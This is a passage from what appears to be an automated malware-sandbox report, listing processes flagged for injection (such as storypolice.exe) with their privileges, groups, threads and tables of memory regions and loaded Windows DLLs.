end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3421 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3422 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3423 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3424 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3425 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3426 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3427 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3428 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3429 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3430 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3431 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3432 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3433 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3434 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 3435 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 3436 start_va = 0xa80000 end_va = 0xb3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 3437 start_va = 0xbf0000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 3438 start_va = 0xc00000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 3439 start_va = 0x11e0000 end_va = 0x11f6fff monitored = 0 entry_point = 0x11e14a1 region_type = mapped_file name = "arrive.exe" filename = "\\Program Files (x86)\\MSBuild\\arrive.exe" (normalized: "c:\\program files (x86)\\msbuild\\arrive.exe") Region: id = 3440 start_va = 0x1200000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 3441 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3442 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3443 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3444 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3445 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3446 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3447 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3448 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3449 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3450 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3451 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3452 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3453 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3454 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3455 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3456 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3457 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3458 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3459 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3460 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3461 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3462 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3463 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3464 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3465 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3466 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 183 os_tid = 0x10ac Thread: id = 184 os_tid = 0x1074 Process: id = "31" image_name = "storypolice.exe" filename = "c:\\program files\\windows multimedia platform\\storypolice.exe" page_root = "0x67fdb000" os_pid = "0x1078" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Multimedia Platform\\storypolice.exe\" " cur_dir = "C:\\Program Files\\Windows Multimedia Platform\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3467 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3468 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3469 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3470 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3471 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3472 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3473 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3474 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3475 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3476 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3477 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3478 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3479 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3480 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3481 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3482 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3483 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3484 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 3485 start_va = 0x930000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 3486 start_va = 0xac0000 end_va = 0xb7bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 3487 start_va = 0xfc0000 end_va = 0xfd6fff monitored = 0 entry_point = 0xfc14a1 region_type = mapped_file name = "storypolice.exe" filename = "\\Program Files\\Windows Multimedia Platform\\storypolice.exe" (normalized: "c:\\program files\\windows multimedia platform\\storypolice.exe") Region: id = 3488 start_va = 0xfe0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 3489 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3490 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3491 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3492 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3493 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3494 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3495 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3496 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3497 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3498 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3499 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3500 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3501 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3502 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3503 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3504 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3505 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3506 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3507 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3508 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3509 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3510 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3511 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3512 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3513 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3514 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 185 os_tid = 0x10b0 Thread: id = 186 os_tid = 0x107c Process: id = "32" image_name = "include effect seven.exe" filename = "c:\\program files (x86)\\windowspowershell\\include effect seven.exe" page_root = "0x57609000" os_pid = "0x1094" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\include effect seven.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3611 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3612 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3613 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3614 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3615 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3616 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3617 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3618 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3619 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3620 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3621 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3622 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3623 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3624 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3625 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3626 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3627 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 3628 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 3629 start_va = 0xa90000 end_va = 0xb4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 3630 start_va = 0xba0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 3631 start_va = 0xe70000 end_va = 0xe86fff monitored = 0 entry_point = 0xe714a1 region_type = mapped_file name = "include effect seven.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\include effect seven.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\include effect seven.exe") Region: id = 3632 start_va = 0xe90000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 3633 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3634 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3635 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3636 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3637 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3638 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3639 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3640 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3641 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3642 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3643 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3644 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3645 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3646 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3647 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3648 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3649 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3650 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3651 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3652 start_va = 0x778f0000 